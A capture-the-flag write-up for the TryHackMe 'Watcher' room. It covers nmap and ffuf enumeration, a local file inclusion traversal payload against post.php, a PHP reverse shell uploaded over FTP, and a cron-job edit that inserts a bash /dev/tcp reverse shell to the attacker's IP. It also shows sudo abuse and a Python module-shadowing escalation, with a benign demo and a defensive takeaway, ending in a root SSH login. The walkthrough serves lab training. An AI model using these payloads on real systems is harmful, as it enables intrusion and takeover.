Watcher — TryHackMe

Write-up for Watcher, another TryHackMe room: a boot2root Linux machine that chains a web exploit (local file inclusion) with several common privilege escalation techniques. The room can be found here:

https://tryhackme.com/room/watcher

As usual, let’s start with our enumeration process with nmap.

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.0.46

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.0.46
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 17:01 EST
Nmap scan report for 10.10.0.46
Host is up (0.071s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 19.84 seconds

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.46

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.46
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 17:03 EST
Nmap scan report for 10.10.0.46
Host is up (0.025s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e1:80:ec:1f:26:9e:32:eb:27:3f:26:ac:d2:37:ba:96 (RSA)
| 256 36:ff:70:11:05:8e:d4:50:7a:29:91:58:75:ac:2e:76 (ECDSA)
|_ 256 48:d2:3e:45:da:0c:f0:f6:65:4e:f9:78:97:37:aa:8a (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Jekyll v4.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corkplacemats
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 26.60 ms 10.8.0.1
2 26.80 ms 10.10.0.46
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.21 seconds

So we have 3 open ports. Port 21: FTP does not allow anonymous login, and vsftpd 3.0.3 has no known remotely exploitable vulnerability. Port 22: OpenSSH 7.6p1 likewise gives us nothing directly exploitable for a foothold. We will explore port 80 first and try to brute force directories with ffuf.

FFUF

ffuf -u http://10.10.0.46/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.0.46/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
ffuf v1.1.0
________________________________________________
:: Method : GET
:: URL : http://10.10.0.46/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
index.php [Status: 200, Size: 4826, Words: 1154, Lines: 135]
post.php [Status: 200, Size: 2422, Words: 465, Lines: 84]
css [Status: 301, Size: 306, Words: 20, Lines: 10]
images [Status: 301, Size: 309, Words: 20, Lines: 10]
robots.txt [Status: 200, Size: 69, Words: 4, Lines: 4]
.html [Status: 403, Size: 275, Words: 20, Lines: 10]
.php [Status: 403, Size: 275, Words: 20, Lines: 10]
[Status: 200, Size: 4826, Words: 1154, Lines: 135]
round.php [Status: 200, Size: 3440, Words: 488, Lines: 11]
bunch.php [Status: 200, Size: 3445, Words: 490, Lines: 11]
server-status [Status: 403, Size: 275, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 448 req/sec :: Duration: [0:32:45] :: Errors: 0 ::

Robots.txt

Exploring robots.txt in the web browser shows us two entries, flag_1.txt and secret_file_do_not_read.txt:

Flag1.txt

Opening http://10.10.0.46/flag_1.txt gives us our first flag.

Access to the other file, http://10.10.0.46/secret_file_do_not_read.txt, is forbidden (HTTP 403). We will keep this in mind and carry on.

LFI

From the directory scan above we saw post.php, which takes a parameter named post. Checking this parameter for Local File Inclusion shows that it is indeed vulnerable: we can read /etc/passwd like this:

http://10.10.31.251/post.php?post=../../../../../etc/passwd

We also noticed a few users in the password file: will, ftpuser, mat and toby. Since we have the other text file from robots.txt, we checked whether we can read it as well through the LFI (the include resolves relative to the web root, so no traversal is needed):

http://10.10.31.251/post.php?post=secret_file_do_not_read.txt

Indeed we can, and it gives us the FTP user "ftpuser" and its password.

Flag2.txt

Logging in via FTP with the credentials found above, we find our flag2.

The FTP directory is also writable and is reachable through the web server, so we can upload a PHP reverse shell over FTP, start a netcat listener on our attacking machine, and then request the uploaded file in the browser to trigger the reverse shell, as shown below:

Upgrade Shell

Use the following commands to make our reverse shell more stable (a full TTY with job control and a usable terminal type):

/usr/bin/script -qc /bin/bash /dev/null
# press Ctrl+Z to background the shell
stty raw -echo
fg
export TERM=xterm

Flag3.txt

We got our flag3 by searching for it on the file system:

find / -name flag_3.txt 2>/dev/null

Checking what commands the user "www-data" can run as other users with "sudo -l":

Flag4.txt

So www-data can run anything as toby, so why not run a bash shell as toby:

Indeed we can, and we also find our flag4 in the home directory of user "toby". The note.txt there mentions a cron job, so let's check what cron jobs are running:

This job runs as "mat", and /home/toby/jobs/cow.sh is writable by us, so we can edit it to get a reverse shell as user "mat". Add the following line to cow.sh, with the IP of our own attacking machine, and start a netcat listener on port 4444:

bash -i >& /dev/tcp/10.8.98.192/4444 0>&1

After a minute or so, when the job next fires, we get a reverse shell:

Flag5.txt

We got the flag5 in user mat’s home directory:

Stabilize this shell as we did earlier and check what "mat" can run with sudo -l:

So user "mat" can run the Python script /home/mat/scripts/will_script.py as user will. In will_script.py the "get_command" function is imported from a module named cmd, and that module (cmd.py, alongside the script) is writable by user "mat". So we will add the following code to cmd.py, which will simply spawn a bash shell:

Flag6.txt

Now running will_script.py as:

sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1

gives us a bash shell as user "will", and we find our flag6 in the home directory of user "will".
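Why does editing cmd.py beside will_script.py work? Python puts the script's own directory at the front of sys.path, so a writable cmd.py there shadows the standard-library cmd module. The following added example (my own code, not from the original write-up) reproduces that in a temporary directory with a benign marker in place of the bash payload, and shows that starting the interpreter with -I (isolated mode) drops the script directory from sys.path so the standard-library module is used instead. The file names mirror the write-up; their contents are constructed.

```python
"""Added example (not from the original write-up): demonstrates how a writable
cmd.py next to a script shadows the standard-library cmd module, which is the
mechanism behind the will_script.py privilege escalation above.
"""
import os
import subprocess
import sys
import tempfile

# Stand-in for will_script.py (constructed): reports which cmd module it got.
CALLER = """\
import cmd
print(cmd.__file__)
print(getattr(cmd, "get_command", lambda: "stdlib cmd has no get_command")())
"""

# Stand-in for the edited cmd.py (constructed). The write-up's payload called
# os.system("/bin/bash") here to get a shell as will; this demo only proves
# that the shadowing module is the one that gets loaded.
HIJACK = """\
import os

def get_command():
    return "HIJACKED:" + os.path.abspath(__file__)
"""


def resolve_cmd(script_dir, isolated=False):
    """Run will_script.py from script_dir and return (cmd module file, result).

    With isolated=True the interpreter runs with -I, which leaves the script's
    directory off sys.path (and ignores PYTHONPATH and user site-packages).
    """
    script = os.path.join(script_dir, "will_script.py")
    with open(script, "w") as f:
        f.write(CALLER)
    args = [sys.executable] + (["-I"] if isolated else []) + [script]
    proc = subprocess.run(args, capture_output=True, text=True, check=True)
    module_file, result = proc.stdout.strip().splitlines()
    return module_file, result


def plant_hijack(script_dir):
    """Write the attacker-controlled cmd.py next to the script."""
    with open(os.path.join(script_dir, "cmd.py"), "w") as f:
        f.write(HIJACK)


def is_local(module_file, script_dir):
    """True when the module came from the script's directory, not the stdlib."""
    return os.path.dirname(os.path.realpath(module_file)) == os.path.realpath(script_dir)


def demo():
    """Before the hijack, after it, and after it with -I; returns the verdicts."""
    d = tempfile.mkdtemp(prefix="scripts-")
    before = resolve_cmd(d)
    plant_hijack(d)
    after = resolve_cmd(d)
    isolated = resolve_cmd(d, isolated=True)
    return {
        "shadowed_before": is_local(before[0], d),
        "shadowed_after": is_local(after[0], d),
        "shadowed_isolated": is_local(isolated[0], d),
        "result_after": after[1],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The defensive takeaway: a script run through sudo must not live in, or import from, a directory the invoking user can write to; running it with -I (or from a root-owned directory) closes this particular hole, though it does nothing if the sudo rule lets the user edit the script itself.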

Uploading the Linux Smart Enumeration script to the target and running it reveals a base64 encoded key in the /opt/backups directory:

Decoding the key shows that it is an RSA private key.

Flag7.txt

We know from our enumeration that SSH is enabled, so let's try this key to log in to the target as root (the key file needs 600 permissions before ssh will accept it):

We were able to log in as root and we got our final flag7 in the /root directory.

That's it. Thanks for reading and have a nice day.

0xsanz
Software Developer having keen interest in Security, Privacy and Pen-testing. Certs: Security+, PenTest+, AZ900